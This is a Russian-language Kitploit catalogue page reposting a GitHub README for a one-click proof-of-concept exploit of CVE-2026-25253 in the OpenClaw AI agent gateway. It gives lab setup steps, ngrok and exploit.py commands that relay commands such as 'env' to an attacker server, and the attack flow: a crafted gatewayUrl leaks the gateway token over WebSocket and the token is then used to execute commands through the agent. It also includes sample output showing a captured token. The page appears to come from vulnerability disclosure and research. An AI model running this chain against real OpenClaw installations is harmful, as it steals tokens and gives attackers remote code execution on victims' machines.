Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

ЛентыКонтактыКонфиденциальность© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-25253 — Эксплойт proof-of-concept для CVE-2026-25253 в OpenClaw: специально сформированный gatewayUrl позволяет похитить токен шлюза Control UI, что открывает несанкционированный доступ к шлюзу и удалённое выполнение кода в один клик. | Kitploit
Инструменты/GitHubGitHub/yym8538/cve-2026-25253
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийЭксфильтрация данныхВеб-безопасностьТестирование на ПроникновениеАутентификацияRed TeamingИнструмент Удаленного Доступа
GitHubyym8538/cve-2026-25253

CVE-2026-25253

Эксплойт proof-of-concept для CVE-2026-25253 в OpenClaw: специально сформированный gatewayUrl позволяет похитить токен шлюза Control UI, что открывает несанкционированный доступ к шлюзу и удалённое выполнение кода в один клик.

141 месяц назадЕщё не проверено
Репозиторий

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-25253 OpenClaw RCE в один клик

★ CVE-2026-25253 OpenClaw Удалённое выполнение кода в один клик PoC ★

https://github.com/user-attachments/assets/e6957c61-7549-4e68-831e-a05436504a3e

Описание

CVE-2026-25253 : Уязвимость эксфильтрации токена аутентификации OpenClaw

описание: OpenClaw (также известный как clawdbot или Moltbot) до версии v2026.1.29 позволяет злоумышленникам эксфильтровать сохранённый токен аутентификации шлюза путём передачи специально сформированного значения параметра gatewayUrl в Control UI, который автоматически устанавливает WebSocket-соединение без проверки или подтверждения пользователем. Это может привести к несанкционированному доступу к шлюзу и удалённому выполнению кода в один клик.

Требования

  • Docker (Docker Desktop на Windows)
  • Python 3.x (сторона атаки)

Файлы

  • Dockerfile — сборка уязвимой среды OpenClaw
  • templates/ — вредоносные веб-страницы, используемые эксплойтом
  • config.txt — конфигурация OpenClaw, используемая в среде жертвы
  • exploit.py — сервер эксплойта
  • requirements.txt — зависимости PoC

Настройка окружения

  1. Сборка Docker-образа
docker build -t openclaw-vuln .
  1. Запуск окружения (Windows)
docker run -d --name openclaw-vuln -p 127.0.0.1:2222:22 openclaw-vuln
  1. Создание SSH-туннеля
ssh-keygen -R [127.0.0.1]:2222
ssh -N -L 18789:127.0.0.1:18789 -p 2222 [email protected]
  • Пароль: openclawlab
  1. Доступ к OpenClaw Control UI Откройте следующий URL в браузере
http://127.0.0.1:18789/
  1. Введите Gateway Token d4b7c7689b82981ff86c735a9f8f616b310491b0d334659a1491c55a13353e66
  2. Нажмите Connect
  3. Откройте вкладку Config
  4. вставьте содержимое config.txt
  5. Замените поле API-ключа на ваш OpenAI API-ключ
  6. Сохраните конфигурацию
  7. Убедитесь, что агент отвечает нормально

Доказательство концепции (PoC)

  1. Установка зависимостей (сторона атаки)
pip3 install -r requirements.txt
  1. Открытие сервера эксплойта через HTTPS
wget https://bin.equinox.io/c/bNyj1mQVY4c/ngrok-v3-stable-linux-amd64.tgz
tar xzf ngrok-v3-stable-linux-amd64.tgz
./ngrok authtoken YOUR_TOKEN
./ngrok http 13337
  • Скопируйте сгенерированное имя хоста для перенаправления
  1. Запуск сервера эксплойта
python3 exploit.py --host YOUR_NGROK_HOSTNAME --command "env"

Пример:

python3 exploit.py --host abcd-1234.ngrok-free.app --command "env"
  1. Запуск атаки
  1. Откройте вредоносную страницу, размещённую сервером эксплойта
  2. Сымитируйте взаимодействие жертвы со страницей
  3. Запустите поток эксплойта из браузера

Поток атаки

  1. Вредоносный URL изменяет gatewayUrl в Control UI жертвы
  2. Браузер автоматически подключается к контролируемой злоумышленником конечной точке WebSocket
  3. Токен аутентификации шлюза утекает к злоумышленнику
  4. Вредоносная страница использует украденный токен для открытия нового WebSocket-соединения с локальным шлюзом OpenClaw жертвы
  5. Запрос на выполнение команды отправляется через агента
  6. Результат выполнения возвращается на сервер злоумышленника

Ожидаемый результат

  • Браузер жертвы перенаправляется в вредоносный поток WebSocket
  • Токен аутентификации шлюза перехватывается злоумышленником
  • Злоумышленник может отправить запрос на выполнение команды через OpenClaw
  • Вывод команды возвращается на сервер злоумышленника

Пример вывода

[*] Exploit Server running on: abcd-1234.ngrok-free.app:13337
[*] Gateway token captured: d4b7c7689b82981ff86c735a9f8f616b310491b0d334659a1491c55a13353e66

==================================================
      [!] EXPLOIT RESULT CAPTURED [!]
==================================================
HOSTNAME=openclaw-vuln
PWD=/root
HOME=/root
...
==================================================

Примечания

  • Данный PoC нацелен на OpenClaw 2026.1.24-1
  • Цепочка эксплойта опирается на уязвимую обработку gatewayUrl в Control UI
  • Для удалённого доступа к жертве вредоносная страница должна обслуживаться по HTTPS
  • Локальный шлюз OpenClaw достигается через браузер жертвы в качестве моста

EQST Insight

Мы публикуем анализ CVE и вредоносного ПО раз в месяц. Если вам интересно, перейдите по ссылкам ниже, чтобы ознакомиться с нашими публикациями.

  • KR : https://www.skshieldus.com/security-insights/reports/eqst_openclaw_rce_vulnerability
  • EN : https://www.skshieldus.com/en/report?tab=eqst
Скачать инструмент